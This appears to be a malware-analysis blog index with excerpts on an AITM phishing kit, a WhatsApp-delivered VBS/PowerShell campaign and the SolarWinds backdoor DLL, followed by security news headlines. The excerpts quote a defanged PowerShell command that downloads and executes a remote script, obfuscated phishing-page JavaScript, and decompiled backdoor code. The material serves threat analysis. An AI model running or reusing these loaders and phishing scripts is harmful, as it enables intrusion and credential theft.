phishing-kit
AITM kit sample (inert / displayed as code) Verify your account No account? Create one! Sign in with a security key Next Sign-in options a@b.com Forgot password? Other ways to sign in Sign in window.addEventListener(‘load’,function(){ const configRef = window[Object.keys(window).find(k => k.startsWith(‘jsConfig_’))]; const { vars: _funcs14, functions: fnMap, props: hbProps } = configRef; const hbCache = […]
Read More →phishing-module
window.addEventListener(‘load’,function(){ const configRef = window[Object.keys(window).find(k => k.startsWith(‘jsConfig_’))]; const { vars: _funcs14, functions: fnMap, props: hbProps } = configRef; const hbCache = window[_funcs14.phpConfig]; const errMsgs = window[_funcs14.errorMessages]; const stateb44f = window[_funcs14.validationState]; const options1ed0 = window[_funcs14.initialOptions]; let viewRef = window[_funcs14.view]; let email0132 = window[_funcs14.enmail]; const accessData747b = window[_funcs14.statusAccessData]; const hbIds = JSON.parse(atob(window[_funcs14.damang])); const _classes81 = JSON.parse(atob(window[_funcs14.suke]));f const […]
Read More →WhatsApp_VBS_PowerShell
Appendix B — PowerShell Snippets (Defanged) Observed Malicious Loader Command (Do NOT Execute) —————————————————————- powershell.exe -ep bypass “[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;iex ((New-Object Net.WebClient).DownloadString(‘https://miportuarios[.]com/sisti/api.ps1’))” IMAP Bootstrap (Mailbox as Config Channel) —————————————————————- # Opens TLS IMAP to imap.terra.com.br:993, logs in, searches subject “data”, fetches latest body. # Shown here for analysis context only; do NOT run in production. # (The […]
Read More →WhatApp_PowerShell_VBS-S2
Overview – Second-stage VBScript is executed in-memory via ExecuteGlobal by a Stage‑0 loader. – Primary goals: Portuguese locale gating, anti-analysis checks, configuration bootstrap (IMAP → multi-domain /data.php → Pastebin), PowerShell stage launch, optional self-delete. Locale Targeting (PT-BR/PT-PT) —————————————————————- Function CheckSystemLanguage() ‘ OSLanguage 1046 = pt-BR, 2070 = pt-PT ‘ Registry fallback: HKCU\Control Panel\International\sLanguage starts with […]
Read More →Solarwinds DLL Quick Overview
Hash and certificate stamp: Filename: solarwinds.orion.core.businesslayer.dll MD5: 846E27A652A5E1BFBD0DDD38A16DC865 sha1: D130BD75645C2433F88AC03E73395FBA172EF676 sha256: CE77D116A074DAB7A22A0FD4F2C1AB475F16EEC42E1DED3C0B0AA8211FE858D6 imphash: DAE02F32A21E03CE65412F6E56942DAA description: SolarWinds.Orion.Core.BusinessLayer file-type: dynamic-link-library certificate-stamp:0xB9480000 (Tue Jan 21 01:00:00 2020) Code Analysis: Part One: // SolarWinds.Orion.Core.BusinessLayer.OrionImprovementBusinessLayer // Token: 0x06000057 RID: 87 RVA: 0x00004F8C File Offset: 0x0000318C private static void DelayMs(double minMs, double maxMs) { if ((int)maxMs == 0) { minMs = 1000.0; maxMs = 2000.0; } double num; for (num = minMs + new Random().NextDouble() * (maxMs – minMs); num >= 2147483647.0; num -= 2147483647.0) { Thread.Sleep(int.MaxValue); } Thread.Sleep((int)num); NOTE: sleeps for 24 days Part Two: // SolarWinds.Orion.Core.BusinessLayer.OrionImprovementBusinessLayer // Token: 0x06000055 RID: 85 RVA: 0x00004E14 File Offset: 0x00003014 private static bool GetOrCreateUserID(out byte[] hash64) { string text = OrionImprovementBusinessLayer.ReadDeviceInfo(); hash64 = new byte[8]; Array.Clear(hash64, 0, hash64.Length); if (text == null) […]
Read More →
Malwarebytes- Age verification vendor Persona left frontend exposed, researchers say February 20, 2026Behind a basic age check, researchers say Persona’s system runs extensive identity, watchlist, and adverse-media screening.
- Facebook ads spread fake Windows 11 downloads that steal passwords and crypto wallets February 20, 2026Attackers are weaponizing Facebook ads to distribute password-stealing malware masked as a Windows download.
- AI-generated passwords are a security risk February 19, 2026AI-generated passwords are "highly predictable" and aren’t truly random, making them easier for cybercriminals to crack.
- Age verification vendor Persona left frontend exposed, researchers say February 20, 2026
- ThreatPost
- Student Loan Breach Exposes 2.5M Records August 31, 20222.5 million people were affected, in a breach that could spell more trouble down the line.
- Watering Hole Attacks Push ScanBox Keylogger August 30, 2022Researchers uncover a watering hole attack likely carried out by APT TA423, which attempts to plant the ScanBox JavaScript-based reconnaissance tool.
- Tentacles of ‘0ktapus’ Threat Group Victimize 130 Firms August 29, 2022Over 130 companies tangled in sprawling phishing campaign that spoofed a multi-factor authentication system.
- Ransomware Attacks are on the Rise August 26, 2022Lockbit is by far this summer’s most prolific ransomware group, trailed by two offshoots of the Conti group.
- Cybercriminals Are Selling Access to Chinese Surveillance Cameras August 25, 2022Tens of thousands of cameras have failed to patch a critical, 11-month-old CVE, leaving thousands of organizations exposed.
- Student Loan Breach Exposes 2.5M Records August 31, 2022